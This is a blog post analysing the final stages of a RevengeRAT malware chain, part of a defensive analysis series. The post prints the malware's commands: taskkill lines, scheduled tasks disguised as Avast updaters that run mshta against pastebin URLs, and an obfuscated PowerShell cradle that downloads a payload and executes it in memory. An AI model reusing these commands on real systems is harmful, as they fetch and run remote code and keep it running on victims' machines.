RevengeRAT (Part 3) More javascript, an executable, and other tomfoolery…

The final installment! Lots of javascript ahead.

Part 1: Getting through the macros.

Part 2: Analysis of javascript from blogspot site to the first pastebin page.

Part 3: Analysis of javascript on remaining pastebin pages.


We left off looking at the code below. It is split up into four distinct parts and we’ll look at each one in turn.

tesla10


Part 1: Kill Microsoft

tesla11.PNG

This one is not that complicated. Create the shell object (line 58), put the command string in a variable (line 60), and run it in line 61. Here’s the full string in line 60. Notice how it’s killing a variety of Microsoft apps:

cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit

Part 2: Writing to the registry

tesla12.PNG

Again, not too complicated. All it is doing is creating a registry key called “WinUpdate” and using mshta.exe to go to ANOTHER pastebin site and download stuff. I guess we’d better check that one out, too.

tesla13.PNG

And here we go again! Five rounds later we get…

tesla14.PNG

self.close? I have no idea why that would be put in the run registry, but there we go.


Part 3.1: Avast Updater

tesla15.PNG

So rather than the run registry, let’s make a scheduled task instead! Line 72 is where the magic happens

69: X_hw0 "schtasks /create /sc MINUTE /mo 300 /t"
70: X_hw1 "n ""Avast Updater"" /tr ""mshta.ex"
71: X_hw2 "e http://pastebin.com/raw/B6DMsewR /F "
72: X_hw schtasks /create /sc MINUTE /mo 300 /tn ""Avast Updater"" /tr ""mshta.exe http://pastebin.com/raw/B6DMsewR /F

Using schtasks.exe, a new task is created (/create), using a schedule (/sc) of minutes, running every 300 minutes (/mo), with a task name (/tn) of “Avast Updater”, and will be running the following command (/tr) “mshta.exe http://pastebin…

Another freaking pastebin site? Yes! And guess what? It’s more javascript to untangle!


Part 3.2: The executable

… four rounds of CyberChef later, we get…

tesla16.PNG

This will be very similar to the ones above. Here it is all laid out and reversed (when necessary):

104: D_XA1 "raw/eD7Nj8tL"
105: D_XA2 "'').replace(''!@#'',''0x'')'));[AppDomain]::CurrentDomain.Load($sc64).EntryPoint.invoke($S,$X)"
106: D_XA0 "Powershell.exe -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''https://pastebin.com/"
107: D_XA Powershell.exe -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString('https://pastebin.com/raw/eD7Nj8tL ').replace(''!@#'',''0x'')'));[AppDomain]::CurrentDomain.Load($sc64).EntryPoint.invoke($S,$X)

Line 106 is a long one and needs some explanation.

Variable $sc64 is going to be created as a byte array. iex means the same thing as Invoke-Expression. GCM *W-O* is an obfuscated way of running this instead: Get-Command New-Object. The contents of YET ANOTHER pastebin page is downloaded, only the characters !@# are replaced with a 0x. It is then loaded up and executed.

So what, pray tell, is at this next pastebin site? More javascript, perhaps?

tesla17.PNG

No! It’s the actual executable! We can now see why the !@# was replaced with a 0x. And if you recall the scheduled task named Avast Updater, this will be downloaded and executed every 300 minutes.


Part 4: Avast backup

This looks familiar.

tesla18.PNG

77: P_wx0 "schtasks /create /sc MINUTE /mo 300 /t"
78: P_wx1 "n ""Avast backup"" /tr ""mshta.ex"
79: P_wx2 "e http://pastebin.com/raw/pQiwYgDK"" /F "
80: P_wx "schtasks /create /sc MINUTE /mo 300 /tn ""Avast backup"" /tr ""mshta.exe http://pastebin.com/raw/pQiwYgDK"" /F "

Another freakin’ pastebin site. Well, we can’t stop now. And it contains javascript. Five rounds later we get…

tesla19.PNG

Another self.close?  Well, at this point, I’ll take it.

That’s it for now! Thanks for reading.

2 thoughts on “RevengeRAT (Part 3) More javascript, an executable, and other tomfoolery…

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s